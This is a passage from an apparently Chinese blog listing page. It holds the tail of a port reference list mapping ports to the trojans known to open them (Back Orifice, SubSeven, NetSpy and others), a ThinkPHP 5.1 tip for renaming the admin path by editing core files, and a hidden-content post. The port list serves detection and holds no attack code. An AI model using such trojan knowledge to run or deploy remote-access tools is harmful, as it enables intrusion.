Pro开放此端口21554端口:木马GirlFriend开放此端口22222端口:木马Prosiak开放此端口23444端口:木马网络公牛开放此端口23456端口:木马Evil FTP、Ugly FTP开放此端口25793端口:Vocaltec地址服务器26262端口:K3软件-服务器26263端口:K3软件客户端26274端口:木马Delta开放此端口27374端口:木马Subseven 2.1开放此端口30100端口:木马NetSphere开放此端口30129端口:木马Masters Paradise开放此端口30303端口:木马Socket23开放此端口30999端口:木马Kuang开放此端口31337端口:木马BO(Back Orifice)开放此端口31338端口:木马BO(Back Orifice),DeepBO开放此端口31339端口:木马NetSpy DK开放此端口31666端口:木马BOWhack开放此端口31789端口:Hack-a-tack32770端口:sun solaris RPC服务开放此端口33333端口:木马Prosiak开放此端口33434端口:路由跟踪34324端口:木马Tiny Telnet Server、BigGluck、TN开放此端口36865端口:KastenX软件端口38201端口:Galaxy7软件数据通道39681端口:TurboNote默认端口40412端口:木马The Spy开放此端口40421端口:木马Masters Paradise开放此端口40422端口:木马Masters Paradise开放此端口40423端口:木马Masters Paradise开放此端口40426端口:木马Masters Paradise开放此端口40843端口:CSCC 防火墙43210端口:木马SchoolBus 1.0/2.0开放此端口43190端口:IP-PROVISION44321端口:PCP服务器(pmcd)44322端口:PCP服务器(pmcd)代理44334端口:微型个人防火墙端口44442端口:ColdFusion软件端口44443端口:ColdFusion软件端口44445端口:木马Happypig开放此端口45576端口:E代时光专业代理开放此端口47262端口:木马Delta开放此端口47624端口:Direct Play服务器47806端口:ALC协议48003端口:Nimbus网关50505端口:木马Sockets de Troie开放此端口50766端口:木马Fore开放此端口53001端口:木马Remote Windows Shutdown开放此端口54320端口:木马bo2000开放此端口54321端口:木马SchoolBus 1.0/2.0开放此端口61466端口:木马Telecommando开放此端口65000端口:木马Devil 1.03开放此端口65301端口:PC Anywhere软件开放端口
2023年02月07日
10 阅读
0 评论
0 点赞
2023-02-05
不使用/admin作为后台路径
不想使用/admin作为后台路径,但是由于thinkphp5.1不支持路由映射,因为此方法需要修改核心文件。总共需要修改两处:1:thinkphp/library/think/route/dispatch/Module.php大约31行增加代码if ($result[0] == 'admin') { throw new HttpException(404, 'module not exists:admin'); } if ($result[0] == 'aa') { $result[0] = 'admin'; }2:thinkphp/library/think/Url.php大约275行增加代码if ($module == 'admin/') { $module = 'aa/'; }
2023年02月05日
8 阅读
0 评论
0 点赞
2023-02-05
KY删除模板解决办法
{dotted startColor="#6bfffd" endColor="#18fb91"/}隐藏内容,请前往内页查看详情{/hide}
2023年02月05日
13 阅读
0 评论
0 点赞
1
...
26
27
28
...
36
0:00